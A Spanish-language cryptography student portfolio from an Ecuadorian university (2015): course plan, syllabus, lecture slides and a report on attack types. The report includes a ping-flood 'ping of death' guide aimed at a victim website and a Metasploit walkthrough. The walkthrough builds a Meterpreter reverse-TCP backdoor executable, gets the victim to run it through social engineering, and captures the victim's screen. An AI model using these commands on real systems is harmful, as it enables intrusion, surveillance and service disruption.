Sei sulla pagina 1di 205

MATERIA:

CRIPTOGRAFIA.

SEMESTRE:
6TO A.

DOCENTE:
ING . GERMANIA VELOZ

REALIZADO POR:
MARLON A. MOSQUERA

5108

Riobamba, 01 De diciembre De 2015

ESCUELA SUPERIOR POLITCNICA DE CHIMBORAZO


VICERRECTORADO ACADMICO
DIRECCIN DE DESARROLLO ACADMICO
PLANIFICACIN SEMESTRAL DE ASIGNATURA
1. DATOS INFORMATIVOS:
FACULTAD: INFORMTICA Y ELECTRNICA

ESCUELA: INGENIERA EN SISTEMAS

CARRERA/CENTRO APOYO: INGENIERA EN SISTEMAS

ASIGNATURA: CRIPTOGRAFA

No. CRDITOS:

No. HORAS: 2

DOCENTE(A):

GERMANIA R. VELOZ R.

2.

PLANIFICACIN SEMESTRAL DE ASIGNATURA

CLASE
No
1

UNIDADES/TEMAS
Introduccin a la Criptografa. Conceptos bsicos y
terminologa. Fundamentos de criptografa

FECHA

HORARIO

2015-10-07

13:00 15:00
13:00 15:00

HORAS
2

Sistemas de encriptacin. Clasificacin de los sistemas de


cifra. Confidencialidad e Integridad
Prctica Definiciones

Criptografa Clsica
Clasificacin. Esctala. Polybios

2015-10-28

Examen escrito

2015-11-04

13:00 15:00

Csar. Vigenere

2015-11-11

13:00 15:00

Playfair. Hill y Vernam

2015-11-18

13:00 15:00

Criptografa Simtrica. Clasificacin. Introduccin a los


sistemas de cifra en bloque

2015-11-25

DES y 3DES

2015-12-02

13:00 15:00

2
2

2015-10-14
2015-10-21

13:00 15:00
13:00 15:00

13:00 15:00

2
2
2

10

Examen escrito

2015-12-09

13:00 15:00

11

IDEA. AES

2015-12-16

13:00 15:00

2016-01-06

13:00 15:00

12

Criptografa Asimtrica

13

Introduccin. Usos. RSA. Diffie-Hellman.


Otros cifradores de clave pblica

2016-01-13

14

Funciones HASH. Funciones Hash. Firmas Digitales.


Autoridades Certificadoras

2016-01-20

15

Revisin de Proyectos

2016-01-27

13:00 15:00

16

Examen escrito

2016-02-03

13:00 15:00

Fecha Presentacin:

13:00 15:00
13:00 15:00

2
2

05 de Octubre del 2015

Entrega: Ing. Germania R. Veloz R.

Revisin: Dr. Julio Santilln

OBSERVACIONES

Saber para Ser

ESCUELA SUPERIOR POLITCNICA DE CHIMBORAZO


SLABO INSTITUCIONAL
1. INFORMACIN GENERAL
FACULTAD
ESCUELA
CARRERA
SEDE
MODALIDAD
SLABO DE
NIVEL
PERODO
ACADMICO
REA
ESPECFICA DE LA
PROFESIN
NMERO DE
HORAS SEMANAL
2

INFORMTICA Y ELECTRNICA

INGENIERA EN SISTEMAS
INGENIERA EN SISTEMAS
MATRIZ ESPOCH

PRESENCIAL
CRIPTOGRAFA
SEXTO
OCTUBRE 2015 MARZO 2016
CDIGO

NMERO DE CRDITOS

IS24185

PRERREQUISITOS

CORREQUISITOS

NOMBRE DEL DOCENTE


NMERO TELEFNICO
CORREO ELECTRNICO
TTULOS ACADMICOS DE
TERCER NIVEL
TTULOS ACADMICOS DE
POSGRADO

IS13133
VELOZ REMACHE GERMANIA DEL ROCIO
032374184-0992911096
g_veloz@espoch.edu.ec
INGENIERO EN SISTEMAS INFORMTICOS
MAGISTER EN INTERCONECTIVIDAD DE REDES

2. DESCRIPCIN DE LA ASIGNATURA
2.1.

IDENTIFICACIN DEL PROBLEMA


RELACIN AL PERFIL PROFESIONAL

DE

LA

ASIGNATURA

EN

El desconocimiento de conceptos, cifradores de clave simtrica y de clave


pblica, manejo de certificados y hashing, as como tambin mecanismos
de cifrado, puede provocar que falle un sistema de informacin y/o
comunicacin, generando productos vulnerables e inseguros.
2.2.

CONTRIBUCIN DE LA ASIGNATURA EN LA FORMACIN DEL


PROFESIONAL
La asignatura de Criptografa permitir al(a) estudiante obtener bases en
conceptos, teora de sistemas criptogrficos y su aplicacin en reas

Pgina 1 de 8

Saber para Ser

relacionadas con la seguridad. Pretende que el(a) estudiante obtenga una


descripcin bsica sobre criptografa, permitindole saber cmo utilizarla,
cuando se le presenten situaciones en la vida profesional que requieran
soluciones relacionadas con esta materia. Adems, conocer cmo es el
funcionamiento de los diferentes algoritmos que dan sentido a las diversas
herramientas que nos brinda la criptografa para asegurar los sistemas
informticos. La Criptografa fortalece el perfil profesional del Ingeniero en
Sistemas e Informtica al bridarle la capacidad de abstraccin para explicar
en forma procedimental mtodos de encriptacin as tambin permitir
aplicar seguridad en sistemas informticos de acuerdo a las necesidades, e
implementar y analizar herramientas de apoyo en el proceso de
proteccin de la informacin.

3. OBJETIVOS GENERALES DE LA ASIGNATURA


Conocer, explicar y aplicar los diferentes algoritmos criptogrficos,
metodologas y tcnicas de cifrado que le permitan al estudiante analizar,
disear,
desarrollar y/o seleccionar mecanismos y herramientas de
seguridad de manera tica y profesional orientados a brindar seguridad
informtica, utilizando el trabajo cooperativo con el grupo de trabajo
4. CONTENIDOS
UNIDADES

OBJETIVOS

Introduccin
Criptografa

la

Describir de forma clara


los conceptos generales
de la criptografa

Criptografa Clsica

Describir los eventos


trascendentales en la
evolucin
de
la
criptografa hasta antes
de la aparicin de la
criptografa moderna

Criptografa Simtrica

Comprender
los
principales cifradores de

Pgina 2 de 8

TEMAS
Conceptos
bsicos
y
terminologa
Fundamentos
de
criptografa
Sistemas de encriptacin
Clasificacin
de
los
sistemas de cifra
Confidencialidad
e
Integridad
Clasificacin
Esctala
Polybios
Csar
Vigenere
Playfair
Hill y Vernam
Clasificacin
Introduccin a los sistemas

Saber para Ser

bloque de clave simtrica

Criptografa Asimtrica

Funciones HASH

Comprender
los

principales cifradores de

bloque de clave pblica

Aplicar sistemas de cifra

como hash, certificados

de cifra en bloque
DES y 3DES
IDEA
AES
Introduccin
Usos
RSA
Diffie-Hellman
Otros cifradores de clave
pblica
Funciones Hash
Firmas Digitales
Autoridades Certificadoras

5. ESTRATEGIAS METODOLGICAS
La metodologa que guiar a la asignatura ser activa, dinmica, reflexiva, crtica
y autocrtica lo que permitir llevar a cabo la construccin del verdadero
aprendizaje enseanza. Ser necesario apoyarnos en los siguientes mtodos y
tcnicas:
En el caso del mtodo investigativo se realizar tcnicas de observacin,
estructuracin de la planificacin, ejecucin de la planificacin y evaluacin as
como la exposicin problmica que se utilizar tcnicas de determinar el
problema, estudiar las causas del problema, formulacin de la hiptesis,
determinar los procedimientos para resolver el problema y encontrar la solucin
as como el mtodo explicativo y sus tcnicas de interpretar el objeto de
informacin, argumentar los juicios de partida, establecer las interrelaciones de
los argumentos, ordenar lgicamente las interrelacione encontradas y de exponer
ordenadamente los juicios y razonamientos, para concluir con el mtodo
observacional con sus tcnicas de determinar el objeto de observacin, analizar e
interpretar los datos, fijar los rasgos y caractersticas del objeto observado,
elaborar conclusiones y finalmente construir el informe de observacin respectivo.

6. USO DE TECNOLOGAS

Pgina 3 de 8

Saber para Ser

REALES

Infocus
Pizarrn, marcador
Aula con medios visuales.
Red informtica
Equipos
Laboratorio multimedia
Bibliografa
VIRTUALES

Software: Linux, SSH, SCP, Browser, Virtualizacin


Internet
Aula virtual.

7. RESULTADOS O LOGROS DE APRENDIZAJE


RESULTADOS O LOGROS
DEL APRENDIZAJE
a. Aplicar conocimientos
especficos de Ingeniera
de Sistemas
Informticos, Matemtica
y Fsica aplicada en el
ejercicio profesional.
b. Definir un problema de
sistematizacin y
comunicacin de
informacin y evaluar la
factibilidad de sus
soluciones en el ejercicio
profesional

CONTRIBUCION
(ALTA,MEDIA,
BAJA)

EL ESTUDIANTE SER
CAPAZ DE

MEDIA

Analizar la criptografa,
identificando los diferentes
componentes de un sistema
criptogrfico

MEDIA

Aplicar una posible solucin a


un problema de la vida real
mediante un sistema de cifrado
moderno adecuado, en base a
los requerimientos solicitados

c. Desarrollar y gestionar
un sistema de
informacin: procesos,
componentes y
programas que cumpla
los requerimientos
solicitados.

MEDIA

d. Aplicar habilidades,

MEDIA

Pgina 4 de 8

Analizar a partir de un
problema especfico dado, la
implementacin de una
alternativa de sistema de
cifrado moderno, empleando un
algoritmo de llave pblica y/o
privado adecuado mediante el
uso de una herramienta de
Software Libre.
Aplicar mediante una

Saber para Ser

tcnicas y herramientas
tecnolgicas en la
solucin de problemas
de su profesin.

herramienta de software
criptogrfico, la gestin
adecuada de llaves pblicas,
llaves privadas, firmas digitales,
certificados digitales.

e. Trabajar efectivamente
en equipo y lograr un
buen desempeo
profesional.

MEDIA

f. Tomar decisiones con


responsabilidad tica,
legal, sustentable y
social de la profesin.

MEDIA

g. Tener la habilidad para


una comunicacin
efectiva en el ejercicio de
su profesin
h. Incentivar un continuo
desarrollo profesional y
personal a lo largo de
vida
i. Identificar la realidad
local, regional, nacional,
mundial y su vinculacin
con el ejercicio de su
profesin.

MEDIA

MEDIA

MEDIA

Organizar grupos de trabajo


mediante la distribucin de
funciones entre sus integrantes
para simular la forma de trabajo
profesional con un nivel alto de
liderazgo.
Aplicar principios ticos y de
responsabilidad social en el
diseo de base de datos para
satisfacer en gran medida
necesidades de seguridad de un
sistema informtico.

Aplicar la documentacin
necesaria para la transferencia
del conocimiento aplicando
normas para la implementacin
de herramientas de cifrado.
Analizar el autoaprendizaje,
mediante la utilizacin de las
herramientas que se
encuentran en la actualidad
Aplicar la articulacin y
contribucin con los objetivos
institucionales y nacionales del
Plan Nacional del Buen Vivir.

8. AMBIENTES DE APRENDIZAJE
El ambiente sugerido para la asignatura requiere que las actividades y tareas
asignadas, cimienten en el estudiante los logros de aprendizaje pertinentes sobre
el manejo y aplicacin de herramientas de uso criptogrfico. En las actividades
prcticas sugeridas es conveniente que el profesor gue a los(as) estudiantes en
el desarrollo de un trabajo de investigacin, mismo que ser relacionado a una
herramienta, algoritmo, entorno o sistema de cifra criptogrfico.
Propiciar actividades de bsqueda, seleccin y anlisis de informacin en
distintas fuentes.
Propiciar el uso de las nuevas tecnologas en el desarrollo de los
contenidos de la asignatura.
Fomentar actividades grupales que propicien la comunicacin, el
intercambio argumentado de ideas, la reflexin, la integracin, la
colaboracin de y entre los estudiantes.

Pgina 5 de 8

Saber para Ser

Propiciar el desarrollo de capacidades intelectuales relacionadas con la


lectura, la escritura y la expresin oral.
Propiciar en el estudiante el desarrollo de actividades intelectuales de
induccin-deduccin y anlisis-sntesis, las cuales lo encaminan hacia la
investigacin, la aplicacin de conocimientos y la solucin de problemas.
Relacionar los contenidos de esta asignatura con las dems del plan de
estudios a las que sta da soporte para desarrollar una visin
interdisciplinaria en el estudiante.
Proponer problemas que permitan al estudiante la integracin de
contenidos de la asignatura y entre distintas asignaturas, para su anlisis y
solucin.
Relacionar los contenidos de la asignatura con el respeto al marco legal, el
cuidado del medio ambiente y con las prcticas de una ingeniera con
enfoque sustentable.

9. SISTEMA DE EVALUACIN DE LA ASIGNATURA


ACTIVIDADES A
EVALUAR
Exmenes
Lecciones
Tareas Individuales
Informes
Fichas de Observacin
Trabajo en Equipo
Trabajo de
Investigacin
Portafolios
Aula Virtual
Otros
TOTAL

PRIMER
PARCIAL
4

SEGUNDO
PARCIAL
5

TERCER
PARCIAL
5

1
1

8 PUNTOS

10 PUNTOS

10 PUNTOS

EVALUACIN
PRINCIPAL
12

12 PUNTOS

SUSPENSIN
20

20 PUNTOS

10. BIBLIOGRAFA
BSICA
Stalling William, Cryptography and Network Security: Principles and Practice, Ed.
Prentice Hall, 1999
COMPLEMENTARIA
Nichols Randall K., Seguridad para comunicaciones inalmbricas: redes,
protocolos, criptografa y soluciones. Ed. McGraw-Hill, 2003
Costas Santos Jess, Seguridad Informtica, Ed. RA-MA, 2011
Stallings William, Comunicaciones y redes de computadoras, Ed. Prentice Hall,
2004
Mitnick Kevin, El Arte de la intrusin, Ed. Alfa y Omega 2007
Maiwald Eric, Fundamentos de Seguridad en Redes, Ed McGraw-Hill, 2005
Jess Ortega, Lpez Miguel, Garca Eugenio, Introduccin a la Criptografa, Ed.
Monografas, 2006

Pgina 6 de 8

Saber para Ser

Gutirrez Jaime, Protocolos criptogrficos y Seguridad de Redes, Ed.


Universidad de Cantabria, 2003
Guatemala Ejrcito, Principios de Criptografa, Tip. Nacional, 2008
Aguilera Purificacin, Seguridad Informtica, Ed. Editex, 2010
Willems Wolfgang, Gutirrez Ismael, Una introduccin a la Criptografa de clave
pblica, Ed. Uninorte, 2008
LECTURAS RECOMENDADAS
Douglas Stinson, Cryptography. Theory and Practice, Ed. Chapman & Hall, 2006
Pino Caballero, Introduccin a la Criptografa, 2da Ed.
Jos Rami Aguirre, Libro electrnico acerca de la seguridad informtica y
Criptografa
Manuel Jos Lucena, Criptografa y Seguridad en Computadoras
WEBGRAFA Y BASES DE DATOS
Muchmore, M. (2014). Is Windows 8.1 Update a Microsoft Backtrack?. PC
Magazine, 51-53.
Reisinger, D. (2014). 10 Reasons to Avoid Replacing Windows XP With Windows
8. Eweek, 2.
FITZGERALD, T. J. (2014, April 10). The Many Alternative Computing Worlds of
Linux. New York Times. p. B7.
Kerner, S. (2013). Ubuntu Linux, Edge, Desktop and the Wearable Computing
Future. Eweek, 10.
Ovadia, S. (2013). Linux for Academics, Part I. Behavioral & Social Sciences
Librarian, 32(4), 252-256.
Grinshpan, L. (2013). Operating systems: Queuing Models to the Rescue, 114 126
Grinshpan, L. (2012). Components of an Operating System Operating System
Overhead, Wiley-IEEE PressEdition, 114 126.
http://www.linux.org/
http://www.microsoft.com/latam/technet.

Ing. Germania R. Veloz R. Msc.


DOCENTE

Ing. Jorge Menndez


COORDINADOR DE REA

Dr. Julio Santilln


DIRECTOR DE ESCUELA
FECHA DE PRESENTACIN

Riobamba, 05 de Octubre del 2015

Pgina 7 de 8

Saber para Ser

CONSTANCIA DE BIBLIOGRAFA BSICA

FIRMA DE RESPONSABILIDAD

Pgina 8 de 8

CRIPTOGRAFA
HISTORIA

CRIPTOLOGA

Ing. Germania Veloz R.

Es

muy antigua como la escritura.


Los egipcios usaron mtodos criptogrficos ->
escritura jeroglfica.
Primer mtodo de encriptado: Julio Csar.
Padre de la Criptografa: Len Battista
Alberti. Publica libro Tratado de
cifras(1470) y Poligrafa (1530).
En el siglo XIX se emple el mtodo de
transposicin.
Diffie y Hellman establecen bases tericas de
los algoritmos de llave pblica.

Garantizar

Comunicacin secreta entre

entidades.
Asegurar informacin autntica en doble
sentido.
Impedir que el contenido del mensaje
enviado llamado criptograma sea
modificado.

Inventa

nuevos algoritmos y abarca a:

Criptoanlisis

Criptografa

Criptografa (Kripto=oculto, graphos=escritura)

Ciencia que se encarga de estudiar las distintas


tcnicas empleadas para transformar (encriptar
o cifrar) la informacin y hacerla irreconocible a
todos aquellos usuarios no autorizados de un
sistema informtico de modo que solo los
legtimos propietarios pueden recuperar
(desencriptar o descifrar) la informacin
original.

Mecanismo para garantizar la confidencialidad,


la integridad y la autenticidad de la informacin.

La

criptografa es la ciencia que resguarda


documentos y datos que acta a travs del
uso de las cifras o cdigos para escribir algo
secreto en documentos y datos que se aplica
a la informacin que circulan en las redes.

Encuentra

sistemas para descifrar la


informacin que se transmite por un medio.
Conjunto de tcnicas que intenta descubrir
la clave empleada en la comunicacin

Mensaje
en claro

Algoritmo de
encriptacin

Clave

Mensaje
cifrado

Un

buen sistema criptogrfico ser aquel que


ofrezca un descrifrado imposible pero un
encriptado sencillo.

La

finalidad es doble:

Mantener la confidencialidad del mensaje.

Garantizar la autenticidad tanto del mensaje


como del par remitente/destinatario..

Mensaje cifrado

A
CIFRADO

DESCIFRADO

Mensaje de
origen

Mensaje de
origen

DESCRIPTADO
Interceptado

Mensaje de
origen?

Generalidades

Componentes

Ing. Germania Veloz R.

La

seguridad es un conjunto de tcnicas que


tratan de minimizar la vulnerabilidad de los
sistemas o de la informacin contenida.
La seguridad no es total.
Vulnerabilidad es considerada un error o
posible hueco de seguridad.

Son

todas las herramientas empleadas para


proteger sus servicios y conectividad.

Los

mecanismos
construyen
protocolos de seguridad que son
usados en los servicios.
Se
apoyan
en
tcnicas
criptogrficas, dando origen a
Mecanismos Criptogrficos.
La Criptografa es la base de
apoyo de los servicios de
seguridad, pero no ms.

Es

un conjunto de reglas y formatos que


determinan el intercambio de piezas de
informacin.
Establecen servicios de seguridad.

Protegen las comunicaciones de los usuarios frente


a los distintos ataques.
Ataques sobre la identidad de las entidades
Interceptacin de identidades.
Suplantacin de identidad (masquerade)
Ataques sobre los servicios
Negacin del servicio
Ataques sobre la informacin
Revelacin de datos
Reenvo de datos
Manipulacin de datos
Repudio en envo y/o recepcin de datos.

Dentro de los ms importantes:


Autenticacin de entidades
Confidencialidad de datos
Integridad de datos
Control de acceso
No repudio
Disponibilidad
Anonimato

Servicio

que garantiza que una entidad


comunicante es quien dice ser.

Protege

a los datos para evitar que sean


revelados accidental o deliberadamente a un
usuario no autorizado.

Garantiza

al receptor que los datos enviados


y recibidos coinciden, pudiendo detectar si
se ha producido algn dao, adicin,
sustraccin o cambio.

Evita

el uso no autorizado de los recursos de


la red.
Quin puede hacer qu?

Propiedad

de un sistema o recurso de estar


accesible y utilizable a entidades
autorizadas.

Mantiene

oculta la identidad de la persona


que realiza una determinada tarea
telemtica.

Puede ser:
Con prueba de origen: El receptor del
mensaje adquiere una prueba, demostrable
ante terceros del origen de los datos
recibidos.
Con prueba de envo: El receptor o el emisor
del mensaje adquieren una prueba
demostrable de la fecha y hora de envo.
Con prueba de entrega: El emisor del
mensaje adquiere una prueba, demostrable
ante terceros, de que los datos han sido
entregados al receptor adecuado.

DEFINICIN
TIPOS

Ing. Germania Veloz R.

Tengo un sobre con una carta cuyo


contenido secreto quiero que llegue a
un amigo. Alguien Podra abrirla y leer
el contenido?

Una caja a prueba de robo podra ser


la solucin?
Si a la caja le colocamos un candado
con combinacin. De manera que solo
el que conozca la combinacin podra
abrir el candado y leer la carta.

Es

seguro de que alguien pueda abrirlo


aunque no conozca la combinacin?.
Seguro, existe un candado que fue diseado
por el mayor experto del mundo, si se olvida la
combinacin, nadie puede abrirlo.
Se puede probar posibles combinaciones?
Este candado tiene 8 dgitos, lo que significa
que

Si

tarda 10 segundos en probar cada


combinacin.

Listo

estoy seguro@ que nadie podr abrir el


candado-- envo la carta.

Deseo

enviar una mensaje por Internet a


un amigo - me sirve la caja????

En realidad no sera una buena idea pero se


puede emplear un equivalente digital del
candado (criptografa)
Para cifrar grandes cantidades de datos, se
utiliza un tipo de algoritmo de cifrado
conocido como de Clave Secreta o Simtrico.

Sistema

de Cifrado Simtrico
- Se usa la misma clave para cifrar y
descifrar.
Sistema de Cifrado Asimtrico.
- Pareja de claves:
Una clave pblica para cifrar.
Una clave privada para descifrar (no se
puede deducir la clave privada a partir de
la clave pblica. (PKE: Public Key
Encription).

Robustez.

La forma como ha sido diseado un algoritmo.


Desde la antigedad se usaron dos tipos de
operaciones de cifrado:
Sustitucin
Transposicin.
Algunos algoritmos modernos de cifrado
utilizan mltiples vueltas de cifrado en la que
se combinan estas dos operaciones

AES
3DES

Aleatorio
Eliminarse

del texto cifrado cualquier pista o

patrn.
La combinacin de la sustitucin y
transposicin difunde, es decir, distribuye o
dispersa, la estructura estadstica del
mensaje sobre la totalidad del texto cifrado.

Longitud

de la clave

Cantidad de bits empleados para la clave

Difusin: Oculta la relacin entre el texto en


claro y el texto cifrado.
Confusin: Oculta la relacin entre el texto
cifrado y la clave secreta.
Algoritmos que usan los dos se llaman cifradores
de productos.

Qu sucede si se cambia un bit de la clave?


Cambiara la mitad de los bits del texto cifrado.
La aplicacin de la confusin y la difusin se
produce en una vuelta de cifrado.

La

seguridad del sistema debe recaer en la


seguridad de la clave, debindose suponer
conocidos el resto de los parmetros del
sistema criptogrfico.

Claude

Shannon:
El adversario conoce el
sistema.

Es

un mtodo de ataque que no ataca el


algoritmo en s, sino que busca
exhaustivamente todos los posibles valores
de la clave hasta dar con la correcta.

Es

decir maneja la longitud de la clave con


las posibles combinaciones- tarea
ejecutada en un ordenador.

Hoy

en da se estima claves de 128 bits de


longitud. (SSL)

DES: 56 bits 256


AES: Se basa en el algoritmo de Rijndael,
donde cada bit que se aade a la clave dobla
el tamao del espacio de claves posibles.
El algoritmo es seguro cuando su diseo es
robusto y la longitud de la clave es
suficientemente larga.

Cmo

distribuyo la clave a los destinatarios?

Problema

de distribucin de la clave.

Al

manejar una clave secreta se presenta el


problema de como distribuir la clave al
destinario(destinatarios).
En la antigedad el manejo de la clave
simtrica era suficiente porque solo era
manejada por militares, diplomticos y
algunas empresas.

Cmo

envo la clave secreta de forma


segura a travs de un canal inseguro?

Abrirlo: Quien
tiene la llave
Cerrarlo: Todos

Dispone

de dos claves:
Pblica conocida por todos (facilita
distribucin) Cifra
Privada: Conocida por el poseedor. Descibra

A pesar de cifrar usando la clave pblica, slo


el que posee la correspondiente clave privada
podr descifrar.

MATERIA:
CRIPTOGRAFIA.

SEMESTRE:
6TO A.

DOCENTE:
ING . GERMANIA VELOZ

REALIZADO POR:
MARLON A. MOSQUERA

5108

Riobamba, 01 De diciembre De 2015

AUTENTIFICACIN
TRASHING.Su finalidad es la obtencin sin autorizacin de informacin privada a partir de la recuperacin de
archivos, documentos, directorios e, incluso, contraseas que el usuario ha enviado a la papelera
de reciclaje de su equipo.
Con esta conducta, el hacker adems de buscar el propio archivo que se ha descartado busca
datos tambin en el historial de navegacin o en los archivos que almacenan las cookies.
Toda esta informacin recolectada a partir del material descartado va a ser la base que permita al
ciberdelincuente cometer sus posteriores ataques.
MODO DE ATAQUE.Generalmente, un usuario anota su login y password en un papelito y luego, cuando lo recuerda,
lo arroja a la basura. Este procedimiento por ms inocente que parezca es el que puede
aprovechar un atacante para hacerse de una llave para entrar el sistema..."nada se destruye, todo
se transforma".
El Trashing puede ser fsico (como el caso descripto) o lgico, como analizar buffers de impresora y
memoria, bloques de discos, etc.
El Trashing fsico suele ser comn en organizaciones que no disponen de alta confidencialidad,
como colegios y universidades.
El trashing lgico, analiza buffers de impresora y memoria, bloques de discos, etc.
CONFIDENCIALIDAD
SNOOPING.Los ataques de esta categora tienen el mismo objetivo que el Sniffing: obtener la informacin sin
modificarla.
Sin embargo los mtodos son diferentes. Aqu, adems de interceptar el trfico de red, el atacante
ingresa a los documentos, mensajes de correo electrnico y otra informacin guardada, realizando
en la mayora de los casos un downloading (copia de documentos) de esa informacin a su propia
computadora, para luego hacer un anlisis exhaustivo de la misma.
El Snooping puede ser realizado por simple curiosidad, pero tambin es realizado con fines de
espionaje y robo de informacin o software. Los casos mas resonantes de este tipo de ataques
fueron: el robo de un archivo con mas de 1700 nmeros de tarjetas de crdito desde una
compaa de msica mundialmente famosa, y la difusin ilegal de reportes oficiales reservados de
las Naciones Unidas, acerca de la violacin de derechos humanos en algunos pases europeos en
estado de guerra.

MODO DE ATAQUE.Para poder explotar esta vulnerabilidad de una forma sencilla y automatizada se ha desarrollado la
herramienta DNSSnoopy. El funcionamiento de la herramienta es el siguiente:
Primero obtiene los servidores DNS del dominio solicitado.
Comprueba si alguno de ellos es vulnerable al ataque de snooping, para ello se solicita un
listado de los dominios ms comunes hasta que se encuentra alguno cacheado o se acaba
la lista.
Si se ha obtenido uno o ms servidores vulnerables se procede a probar una lista de
dominios que se indique para encontrar los cacheados con anterioridad.
Trata de calcular el tiempo que hace que se cache en el servidor vulnerable, para ello
compara el TTL obtenido del servidor cacheado con el TTL original.

Activar DHCP snooping en un cisco:


(config)#Ip dhcp snooping
Identificar la Vlan donde DHCP snooping se va implementar:
(config)#Ip dhcp snooping vlan {identificador Vlan}
Se configuran los puertos confiables donde estn localizados los servidores DHCP reales:
(config)#Interface {tipo de interface y nmero por ejemplo fa0/0}
(config-if)#ip dhcp snooping trust
Para los puerto no confiables se permiten un nmero ilimitado de peticiones DHCP, para
limitarlo se usa:
(config)#Interface {tipo de interface y nmero}
(config-if)#ip dhcp snooping limit rate {rango de 1 a 2048 paquetes por Segundo, por ejemplo: 5
para una red pequea}

DISPONIBILIDAD
DoS.Los protocolos existentes actualmente fueron diseados para ser empleados en una comunidad
abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil desorganizar el
funcionamiento de un sistema que acceder al mismo; as los ataques de Negacin de Servicio
tienen como objetivo saturar los recursos de la vctima de forma tal que se inhabilita los servicios
brindados por la misma.
MODO DE ATAQUE.Como el concepto bsico del DDoS es simple, realizar los ataques es relativamente fcil. De hecho,
valdra con que hubiese un nmero suficientemente grande de personas recargando la web
continuamente para tirarla. Sin embargo, las herramientas que se suelen usar son algo ms
complejas.
Con ellas se pueden crear muchas conexiones simultneas o enviar paquetes alterados con las
tcnicas que comentaba antes. Tambin permiten modificar los paquetes poniendo como IP de
origen una IP falsa, de forma que no pueden detectar quin es el atacante real.

PING DE LA MUERTE

Entramos a nuestro men de Windows y ejecutamos CMD. Se nos abrir la tpica


pantalla de MSDOS en la que, si ponemos ping, veremos las opciones de la funcin que
empleamos.

Para nuestro ping son -t y -l. Con la -t mandamos el ping de forma repetida y
continuada, y con la -l elegimos el peso de cada ping, en este caso bfer. Ahora
debemos conocer la IP de la web a la que queremos atacar. Para ello tecleamos un
nuevo y simple comando: ping www.webqueatacare.com y damos a Intro. En
pocos segundos nos dar una IP como veis a continuacin:

Ahora, con la IP de nuestra vctima, debemos teclear el nuevo comando que har
temblar la pgina. Os recomiendo escribirlo en un bloc de notas y luego pegarlo en
el CMD para que podis modificarlo rpidamente. El formato debe ser as: ping
123.111.23.453 -t -l 15000. Lgicamente debis cambiar la IP por la de vuestra
vctima, y la cifra final es la cantidad de bytes que estis enviando. La -t y -l son los
comandos de ping que empleamos. En la siguiente pantalla podis ver un ataque de
pings exitosos.

INTEGRIDAD:
TROYANOS.Aunque tericamente no son un virus, puesto que no cumplen con todas las caractersticas, se
incluyen en este grupo debido a que se propagan de la misma manera. Un Troyano es un pequeo
programa alojado en un archivo "husped". Su funcin es pasar inadvertido al usuario para que
despus de instalado pueda realizar diversas funciones, ocultas al usuario.

MODO DE ATAQUE.ATAQUE DE BACKDOOR CON BACKTRAK5 EN MAQUINA VIRTUAL( VMWARE 7)


Vctima: Sistema Operativo Windows Professional XP SP3
IP: 192.168.10.6 Mascara de red: 255.255.255.0
Atacante: Sistema Operativo Backtrack 5
IP: 192.168.10.5 Mascara de red: 255.255.255.0
Paso 1: Identificamos a la vctima y obtenemos su ip, existen varias formas de obtenerlas por
ejemplo en una LAN podemos usar herramientas como Advance IP Scaner
(recomendado), una vez identificada la victima pasamos a crear el Backdoor en Backtrack 5.
Paso 2: Ingresamos a Backtrack 5 y abrimos una terminal consola.
aso3: Escribimos el siguiente codigo con el cual se crear un archivo .exe que ser nuestro
servidor
de
Backdoor.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.5 LPORT=4444 X > click.exe

Paso 4: Damos ENTER y se crea un archivo . exe en este caso click.exe y verificamos que se
halla creado, este archivo esta en la carpeta /Home o podemos usar DOPHINque es un
explorador de archivos.

Paso 5: Ahora abrimos una sesin Metasploit la cual se puede hacer de varias formas: abrir
una
consola
terminal
y
digitamos
la
siguiente
sentencia cd
/pentest/exploits/framework3 luego ./msfconsole. La otra forma es abrir una consola
terminal y digitamos msfconsole y damos ENTER. Otra es ingresando por el menu de
backtrack 5 .
Paso 6: Una vez iniciada la sesin de MSF abrimos un listener (Escuha) que va a estar activo
espereando que el servidor que estar en la vctima se inicie. Aqu se utilizan las sentencias
siguientes:
use exploit/multi/handler [ENTER] Iniciamos el Listener.
set PAYLOAD windows/meterpreter/reverse_tcp [ENTER] Plugins de Meterpreter.
set LHOST 192.168.10.5 [ENTER] Seteamos el IP del atacante.
set LPORT 4444 [ENTER] Seteamos el puerto del atacante.
Paso 7: Ahora enviamos el backdoor (click.exe) que hicimos a nuestra victima por cualquier
de los medios antes explicados usando ingeniria social en ciertos casos para que la victima
utilice el archivo enviado.
Paso 8: Ahora podemos hacer uso de las herramientas de exploit/meterpreter para realizar
actividades remotas a la PC de la vctima. Como ejemplo haremos una captura de pantalla.
Con la sentencia :
screenshot /img.jpg

[captura la imagen de la pantalla de la vctima]

NOTA: Se debe de poner la direccin donde se guardar el archivo jpg con el scrennshot. O
por default al directorio
/opt/framework3/msf3/[nombre del archivo]

Bibliografa
Borghello, C. (2000). Segu-Info. Obtenido de http://www.seguinfo.com.ar/ataques/ataques_monitorizacion.htm
cmdsistemas. (s.f.). CMD sistemas. Obtenido de
https://cmdsistemas.wordpress.com/2013/05/14/dhcp-snooping-y-cisco/
EcuRed. (2006). Obtenido de http://www.ecured.cu/Trashing
Eduardo Puga, y. c. (29 de 09 de 2011). LOS INFORMATICOS. Obtenido de
https://losinformaticosseg.wordpress.com/2011/09/29/backdoor-el-ataque-silencioso/
Medina, I. (23 de nov. de 2014). wordpress. Obtenido de
https://ivanmedina05.wordpress.com/2014/11/23/ataques-remotos-a-los-sistemas-deinformacion/
Nolla, A. (Sep de 2010). bugBlog. Obtenido de http://blog.buguroo.com/dnssnoopy-herramientapara-hacer-dns-cache-snooping/
ogmios. (s.f.). WWW.TODOECOMMERCE.COM. Obtenido de
http://www.todoecommerce.com/ataques-informaticos.html
S/N. (2 de Agost de 2013). CHUISO.COM. Obtenido de http://chuiso.com/como-hacer-ataquesddos/

MATERIA:
CRIPTOGRAFIA.

SEMESTRE:
6TO A.

DOCENTE:
ING . GERMANIA VELOZ.

REALIZADO POR:
MARLON A. MOSQUERA

5108

Riobamba, 04 De NOVIEMBRE De 2015

QUE ES LA CRIPTOGRAFIA CLASICA.


Se dice que la criptografa se dio a su existencia por medio de cuestiones militares, religiosas o
comerciales que impulsaron desde tiempos muy antiguos dando el uso de escritura secreta. Se
rememora a los antiguos egipcios usaron mtodos criptogrficos como lo es la escritura hiertica
(jeroglifica) que se poda decir que claramente era incomprensible para el resto de la poblacin
humana. En la poca babilnica tambin se usaron estos mtodos como son la escritura
cuneiforme.

